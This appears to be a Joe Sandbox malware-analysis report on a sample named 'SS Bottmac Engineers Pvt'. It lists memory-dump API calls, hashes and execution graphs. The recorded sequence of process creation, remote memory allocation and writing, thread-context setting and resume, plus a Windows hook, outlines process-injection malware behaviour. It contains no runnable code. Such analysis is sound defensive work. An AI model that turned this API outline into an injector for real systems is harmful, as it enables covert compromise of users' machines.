                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 7d75311396505dc1fb09f785a1e1af2b12bcfd583fadae3653d91483dc6852bc
                                • Instruction ID: f2f8fd59cc62998f1bca4ae8002c63c1e5d059f5d5bd7791b845168461ad14cd
                                • Opcode Fuzzy Hash: 7d75311396505dc1fb09f785a1e1af2b12bcfd583fadae3653d91483dc6852bc
                                • Instruction Fuzzy Hash: 982137B1D003499FCB10DFAAC884AEEFBF5FF48310F10842AE519A7240C7789945CBA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0786CF9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 495413c69f1eb6ced2ec8fd483eb52457dd17b39a4996736f8d677e6ba36bb2a
                                • Instruction ID: 1d87363506bb5d13e4913bef9676bc5d06f2625e66b68087a5422a813891e120
                                • Opcode Fuzzy Hash: 495413c69f1eb6ced2ec8fd483eb52457dd17b39a4996736f8d677e6ba36bb2a
                                • Instruction Fuzzy Hash: 4A2115B19003099FDB10DFAAC4857EEFBF5EF89314F14842AD559A7240CB78A945CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017CD8AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 2080f277054d7c129f8234a45c25f6c5e09502d1b5976e0b98c74a2e8f032600
                                • Instruction ID: b59a5216815fd3a1e367c20037cf545dfebe16ec85c70d8bf4af4f8b2e2353c6
                                • Opcode Fuzzy Hash: 2080f277054d7c129f8234a45c25f6c5e09502d1b5976e0b98c74a2e8f032600
                                • Instruction Fuzzy Hash: 6C21B3B59002499FDB10CF9AD984ADEFFF9FB48710F14842AE918A7350D378A944CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0786D49E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e1192d6e9e0e815daadaaeb48fb913b16570816e2cfac8aeb53a44fde6423aee
                                • Instruction ID: ef493157d60ca0bbc7ee8b0bb1db20d0ba9469f7a6640affc5535a4dc8180975
                                • Opcode Fuzzy Hash: e1192d6e9e0e815daadaaeb48fb913b16570816e2cfac8aeb53a44fde6423aee
                                • Instruction Fuzzy Hash: DB1147B19002099FDB10DFAAC845BEEFFF5EF58324F248419E919A7250C779A941CFA0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0786D49E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 98e7219b3867987489b3ca80634a2d93e5da101759d9c189997cae7393b5ff00
                                • Instruction ID: d2a166e77a211d146a361e55b2567ce6c88792401a9293af4ae5aee05e5f91fa
                                • Opcode Fuzzy Hash: 98e7219b3867987489b3ca80634a2d93e5da101759d9c189997cae7393b5ff00
                                • Instruction Fuzzy Hash: D21137B19002499FCB10DFAAC844AEEFFF5EF88324F148419E519A7250C779A944CFA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 017CB59E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0

                                Execution Graph

                                Execution Coverage:7.3%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:22
                                Total number of Limit Nodes:3

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0318B8D6,?,?,?,?,?), ref: 0318B997
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0

                                Control-flow Graph

                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0318B8D6,?,?,?,?,?), ref: 0318B997
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0

                                Control-flow Graph

                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0318652B
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                APIs
                                • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0318652B
                                Memory Dump Source
                                • Source File: 00000009.00000002.4527534099.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_3180000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526447974.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_16ed000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a69296542eb39adbe2c8de5c0571af7ef8eb1c469bc71cfbeda0c80dcfceb4f
                                • Instruction ID: c7f233e056f42c9191990267900ac9ce6c870e92ed5ac732155f7b384d710b4a
                                • Opcode Fuzzy Hash: 2a69296542eb39adbe2c8de5c0571af7ef8eb1c469bc71cfbeda0c80dcfceb4f
                                • Instruction Fuzzy Hash: 262103B1504240DFDB05DF58DDC8F2ABFA5FB88318F248669E9090B356C33AD416CAA2
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74b174bea60abe41b57de91b767ce29ff142207fb1139bc215e246eb83853cf7
                                • Instruction ID: 1e488edd6aaafcf08cb78ab8757cf2000797d577291d7af2cf6674edf5556703
                                • Opcode Fuzzy Hash: 74b174bea60abe41b57de91b767ce29ff142207fb1139bc215e246eb83853cf7
                                • Instruction Fuzzy Hash: 4A21F2755042049FDB4ADFA8D9C0F26BBA9FB88314F20C96DD90D4B296CB3AD446CA61
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 56b5b988c53d80dbc250e83b5bb7788881386d95d2ff80c8f4cedea8f80f5a32
                                • Instruction ID: b218698eb903d2ba25c1ffa91c5e6326b4d004d36f9cf48958f2cd51e328bfe5
                                • Opcode Fuzzy Hash: 56b5b988c53d80dbc250e83b5bb7788881386d95d2ff80c8f4cedea8f80f5a32
                                • Instruction Fuzzy Hash: 3921F271604200DFDB16DFA8C580F26BFB9EB84354F20C56DD90D4B392C33AD846C661
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526447974.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_16ed000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: 3a72a4fa57041afaa7fda42abd4898a6461a84f25395738bd5f51df2f629f8fe
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: 0A11DF72404280CFCB02CF44D9C8B16BFB2FB84314F24C6A9D9094B656C336D45ACBA2
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: b5a54fa1b37a6c9d42002f1a94f816698ce6c726925494d2af903ebb08fdecd8
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 7811BB75504284CFDB0ACF98D9C4B15BFA2FB84224F24C6A9D8494B296C33AD44ACB62
                                Memory Dump Source
                                • Source File: 00000009.00000002.4526939906.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_190d000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                • Instruction ID: 134643515158137284677e2743cdc85508f13a2568af57aaa93aced2e0829af5
                                • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                • Instruction Fuzzy Hash: 5E118B75504280CFDB16CF54D5C4B15BFB1FB84218F24C6A9D94D4B696C33AD44ACB92

                                Execution Graph

                                Execution Coverage:9.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:152
                                Total number of Limit Nodes:13
                                execution_graph (rendered node/edge graph not preserved; summarized from the dump): roots at 124d5e0, 124b250, 777db00, 777de00, 124d828, 1244668 and e960ef8; API nodes reached: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW, CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread, DuplicateHandle, CreateActCtxA, PostMessageW (777f91a alone reaches 12 API calls).

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 124d5d0-124d7ad; calls GetCurrentProcess, GetCurrentThread, GetCurrentThreadId and subroutine 124d7b1.
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0124D65E
                                • GetCurrentThread.KERNEL32 ref: 0124D69B
                                • GetCurrentProcess.KERNEL32 ref: 0124D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0124D731
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 459d56549ad0248f1ea722ce1fcc9406a1b99b3f71197d8d4ca605539ad87459
                                • Instruction ID: cd55fbdc48fd93f8ef5db53977b965aa41a1527be6e856cac2f84a2402e73153
                                • Opcode Fuzzy Hash: 459d56549ad0248f1ea722ce1fcc9406a1b99b3f71197d8d4ca605539ad87459
                                • Instruction Fuzzy Hash: 065155B09103498FDB18DFA9D948BAEBFF1EF89304F208459D549A7260DBB85884CF65

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 124d5e0-124d7ad; calls GetCurrentProcess, GetCurrentThread, GetCurrentThreadId and subroutine 124d7b1.
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0124D65E
                                • GetCurrentThread.KERNEL32 ref: 0124D69B
                                • GetCurrentProcess.KERNEL32 ref: 0124D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0124D731
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 8a6f16f5fd7064d33a9b0690c50ab73d06178f7182c39a3b04ff3750c66b753c
                                • Instruction ID: 56a1e0a4b1d393f645ec192536c0ff0fd13c4a45d591b06794f65ac301df1465
                                • Opcode Fuzzy Hash: 8a6f16f5fd7064d33a9b0690c50ab73d06178f7182c39a3b04ff3750c66b753c
                                • Instruction Fuzzy Hash: CF5145B0A102498FDB18DFA9D548BAEBFF1FF89304F208459E509A7360DBB85944CF65

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 777d76c-777dabd; calls CreateProcessA at 777d907-777d9c1.
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0777D9AE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 6c0ece6dfabaebcaa640c4122bb901f16d85a8faf8702823396eb7a14cee6aca
                                • Instruction ID: ba4e8e5ab37deffa09af37c5bb1631b44715c46f827ab2b9e0e9958790e46995
                                • Opcode Fuzzy Hash: 6c0ece6dfabaebcaa640c4122bb901f16d85a8faf8702823396eb7a14cee6aca
                                • Instruction Fuzzy Hash: 68A16CB1E0021ACFDF24DF68C845BEDBBB2BF48354F148569D819A7240DB749985CF92

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 777d778-777dabd; calls CreateProcessA at 777d907-777d9c1.
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0777D9AE
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ba29faeff35f20933db105f82614b7a83338ffa9593403e5d5081b1cc0c6d0c3
                                • Instruction ID: 57a0316193c3fc867d38baf67f44a230622160d5e0a73d23a2f9d06634dc1d2f
                                • Opcode Fuzzy Hash: ba29faeff35f20933db105f82614b7a83338ffa9593403e5d5081b1cc0c6d0c3
                                • Instruction Fuzzy Hash: 28915BB1E0021ACFDF24DF68C845BEEBBB2BF48354F148569D819A7240DB749985CF92

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 124b33b-124b5c8; calls GetModuleHandleW at 124b580-124b5ab and subroutines 1249db8, 124b5e0, 124b5d0, 124b000, 124b010, 124b020, 124b030.
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0124B59E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 02fd2d03e10e2af73ab8cc6f5976fe2acf930fa48d50930424ea14890150f4f5
                                • Instruction ID: 5a37f5bc9712e90bf381559972c9b55fe49ed7756e54cf2ccca67b894993d698
                                • Opcode Fuzzy Hash: 02fd2d03e10e2af73ab8cc6f5976fe2acf930fa48d50930424ea14890150f4f5
                                • Instruction Fuzzy Hash: 30814670A10B468FDB29DF29D4547AABBF1FF88300F048A2ED586DBA50D775E845CB90

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 1245d0c-1245e61; calls CreateActCtxA at 1245d6e-1245dd9.
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01245DC9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b206e709ac2393ec9101b9c12b0abc91dd2b61b94ee893ebfd7f21e02279de52
                                • Instruction ID: 469b502310c5284dacd5bac29a0f5852f0961b384894d8e3a539fac99a34a6c1
                                • Opcode Fuzzy Hash: b206e709ac2393ec9101b9c12b0abc91dd2b61b94ee893ebfd7f21e02279de52
                                • Instruction Fuzzy Hash: 8F4102B0D00619CBDB28DFA9C844BDEBBF1BF49704F20806AD548AB255DB756946CF90

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 1244560-1245e61; calls CreateActCtxA at 1244560-1245dd9.
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01245DC9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 060626b701e9fa21340120aed7fc052ef9d2edfda0daa29a6a5d979f985a35d6
                                • Instruction ID: 98c985885d67154e5df0f933e54c7887c134d4422749991343b6b9f2050cc125
                                • Opcode Fuzzy Hash: 060626b701e9fa21340120aed7fc052ef9d2edfda0daa29a6a5d979f985a35d6
                                • Instruction Fuzzy Hash: 3041F2B0C10719CBDB28DFA9C844B9EBBF5BF49304F20806AD548AB255DBB56946CF90

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 777d4e9-777d5c6; calls WriteProcessMemory at 777d54e-777d58d.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0777D580
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fbb646246c5e4bc61f3a7e64dc62dd9173f153238017e9d4beda48bd006047b9
                                • Instruction ID: badfed09a8d3793a7032f254c8cfb480d149dc57a538083f205142d820d31b72
                                • Opcode Fuzzy Hash: fbb646246c5e4bc61f3a7e64dc62dd9173f153238017e9d4beda48bd006047b9
                                • Instruction Fuzzy Hash: D93116B19003499FCF10DFA9C885BEEBBF5FF48314F108429E959A7250C7799545CBA0

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 777d4f0-777d5c6; calls WriteProcessMemory at 777d54e-777d58d.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0777D580
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 60c2233603f4a557209c8a785d43f435b30dca9e719cc6b5be231c92ce4fef04
                                • Instruction ID: a56292522576de890cfb0a916a78f8a464ee7405f25ae15e3c374087dc3a796b
                                • Opcode Fuzzy Hash: 60c2233603f4a557209c8a785d43f435b30dca9e719cc6b5be231c92ce4fef04
                                • Instruction Fuzzy Hash: C72119B59003599FCF10DFAAC885BEEBBF5FF48314F508429E959A7240C7789944CBA1

                                Control-flow Graph

                                control_flow_graph (rendered graph not preserved): basic blocks 777cf18-777cfe4; calls Wow64SetThreadContext at 777cf7b-777cfab.
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0777CF9E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: a22d21e6adc370eedbc346c8eaa8446641a91e135d0678df6c170b7309fec5a9
                                • Instruction ID: bcc1c500fc4bbaa4fa9b2ba0d4c3ff28694697c328c7f8159f7660f3f820f844
                                • Opcode Fuzzy Hash: a22d21e6adc370eedbc346c8eaa8446641a91e135d0678df6c170b7309fec5a9
                                • Instruction Fuzzy Hash: 602139B19002098FDB10DFAAC4857EEFFF4EF89354F54842AD559A7240CB78A545CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0124D8AF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 497597f49a6f8f88861a58eb06986127bbf44eb393eac2af3519441e003e7493
                                • Instruction ID: 82e109be9733129609d560726a78a91aaa30f3b966e01cc0bbcec1ead82a25d9
                                • Opcode Fuzzy Hash: 497597f49a6f8f88861a58eb06986127bbf44eb393eac2af3519441e003e7493
                                • Instruction Fuzzy Hash: F321C3B59002499FDB10CFAAD984ADEBBF5FB48310F14845AE958A7350D7799940CFA0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0777D660
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: c98c7c4130048522985333747ac3f7bf926e92eb33a2c1c30057281577861713
                                • Instruction ID: f8a3f86a57f66946205ce8bcc2f0d9688390ca25860be41d6370f8e698159783
                                • Opcode Fuzzy Hash: c98c7c4130048522985333747ac3f7bf926e92eb33a2c1c30057281577861713
                                • Instruction Fuzzy Hash: EE2125B1D002599FCB10DFAAC881AEEFBF5FF48310F10842AE519A7240CB789940CBA1
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0777D660
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 1c2d22b6fd88ccc167eefe990f82640d9126a3021567b3338047fac3f02d8384
                                • Instruction ID: 9649f1327f03c4fb19910d2ebc3aff335261467d4b5aedb59e29cad5b8c1a9e8
                                • Opcode Fuzzy Hash: 1c2d22b6fd88ccc167eefe990f82640d9126a3021567b3338047fac3f02d8384
                                • Instruction Fuzzy Hash: 6C2125B1D002599FCB10DFAAC881AEEFBF5FF48310F10842AE519A7240C7789940CBA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0777CF9E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 93c846f7eb57f1e4f99b5981897d0467fe81bf0996bb228b0b9d42383877b512
                                • Instruction ID: 0efb4e1bdcdd3322de2aaf20c09e67579b7d6c0eca6403e33c56a6faee49b48b
                                • Opcode Fuzzy Hash: 93c846f7eb57f1e4f99b5981897d0467fe81bf0996bb228b0b9d42383877b512
                                • Instruction Fuzzy Hash: F52135B19002098FDB10DFAAC485BEEFBF4EF89354F14842AD519A7240CB78A945CFA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0124D8AF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: a89c6e2b363c32cbf05d9d2dcee05a80aab88d68f7574dc1ab0ec2bdb7b53d3d
                                • Instruction ID: bfdd8a08c28f74ea05207c2ee6f8f45db014ea85b69be044127424c5b8160b22
                                • Opcode Fuzzy Hash: a89c6e2b363c32cbf05d9d2dcee05a80aab88d68f7574dc1ab0ec2bdb7b53d3d
                                • Instruction Fuzzy Hash: 3821E4B59002089FDB10CFAAD584AEEBFF8FB48310F14841AE918A3350D378A940CFA0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0777D49E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 0b3cce9056e8d266385032ad2a3806c78416969ad2fa43ba08da68410b526c58
                                • Instruction ID: 72ab72a0e91250aee6257720c20e97baa93cd90af182c7a0bffb57acb7f30400
                                • Opcode Fuzzy Hash: 0b3cce9056e8d266385032ad2a3806c78416969ad2fa43ba08da68410b526c58
                                • Instruction Fuzzy Hash: F621BB718043498FCF20DFA9C405BEEBFF5EF89314F248859D558A7240C779A540CBA1
                                APIs
